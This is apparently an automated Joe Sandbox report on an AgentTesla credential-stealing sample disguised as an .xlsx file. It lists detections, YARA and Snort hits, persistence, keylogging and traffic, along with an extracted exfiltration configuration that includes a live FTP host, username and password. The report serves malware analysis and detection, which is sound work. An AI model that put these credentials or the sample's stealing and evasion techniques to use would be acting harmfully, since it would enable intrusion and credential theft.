Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PRE ALERT Docs_PONBOM01577.xlsx.exe

Overview

General Information

Sample name:PRE ALERT Docs_PONBOM01577.xlsx.exe
Analysis ID:1467356
MD5:1154cd3205e7e1226b03b1ee15278e0a
SHA1:11b53a6d9f81defb309a972c3903b1de976e5911
SHA256:8797ef6cb2e95b65334b38d11068783acad3aa173ede96e152ad66beb40deee3
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • adobe.exe (PID: 7444 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 1154CD3205E7E1226B03B1EE15278E0A)
    • adobe.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 1154CD3205E7E1226B03B1EE15278E0A)
  • adobe.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 1154CD3205E7E1226B03B1EE15278E0A)
    • adobe.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 1154CD3205E7E1226B03B1EE15278E0A)
    • adobe.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 1154CD3205E7E1226B03B1EE15278E0A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.1875942602.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 23 entries
              SourceRuleDescriptionAuthorStrings
              0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2f4ad:$s2: GetPrivateProfileString
                  • 0x2eb59:$s3: get_OSFullName
                  • 0x301ab:$s5: remove_Key
                  • 0x30371:$s5: remove_Key
                  • 0x31230:$s6: FtpWebRequest
                  • 0x32144:$s7: logins
                  • 0x326b6:$s7: logins
                  • 0x35399:$s7: logins
                  • 0x35479:$s7: logins
                  • 0x36dca:$s7: logins
                  • 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
                  4.2.adobe.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 33 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe", CommandLine: "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe, NewProcessName: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe", ProcessId: 4464, ProcessName: PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe, ProcessId: 7180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
                    Timestamp:07/04/24-03:40:20.785490
                    SID:2029927
                    Source Port:49748
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:40:21.384961
                    SID:2855542
                    Source Port:49749
                    Destination Port:63065
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:40:13.264826
                    SID:2851779
                    Source Port:49741
                    Destination Port:63983
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:39:58.804072
                    SID:2855542
                    Source Port:49736
                    Destination Port:63817
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:40:21.384961
                    SID:2851779
                    Source Port:49749
                    Destination Port:63065
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:40:12.687826
                    SID:2029927
                    Source Port:49739
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:41:23.727695
                    SID:2851779
                    Source Port:49751
                    Destination Port:63014
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:39:58.216699
                    SID:2029927
                    Source Port:49734
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:39:58.804072
                    SID:2851779
                    Source Port:49736
                    Destination Port:63817
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/04/24-03:40:13.264826
                    SID:2855542
                    Source Port:49741
                    Destination Port:63983
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeAvira: detection malicious, Label: HEUR/AGEN.1309979
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeVirustotal: Detection: 29%Perma Link
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeReversingLabs: Detection: 23%
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeVirustotal: Detection: 29%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49747 version: TLS 1.2
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: slZY.pdb source: PRE ALERT Docs_PONBOM01577.xlsx.exe, adobe.exe.2.dr
                    Source: Binary string: slZY.pdbSHA256L source: PRE ALERT Docs_PONBOM01577.xlsx.exe, adobe.exe.2.dr

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49734 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 213.189.52.181:63817
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 213.189.52.181:63817
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49739 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49741 -> 213.189.52.181:63983
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49741 -> 213.189.52.181:63983
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49748 -> 213.189.52.181:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49749 -> 213.189.52.181:63065
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49749 -> 213.189.52.181:63065
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49751 -> 213.189.52.181:63014
                    Source: global trafficTCP traffic: 213.189.52.181 ports 63065,63983,63014,1,63817,2,21
                    Source: Yara matchFile source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 213.189.52.181:63817
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 03:39. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp, PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646648170.0000000005720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1646740755.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000000.00000002.1644979202.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1791642925.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1868550635.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1875942602.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4099572148.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49747 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.adobe.exe.3ec1420.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.adobe.exe.3efca40.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3e04f90.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.3dc9970.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.adobe.exe.3efca40.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.adobe.exe.3ec1420.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.2de85e8.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
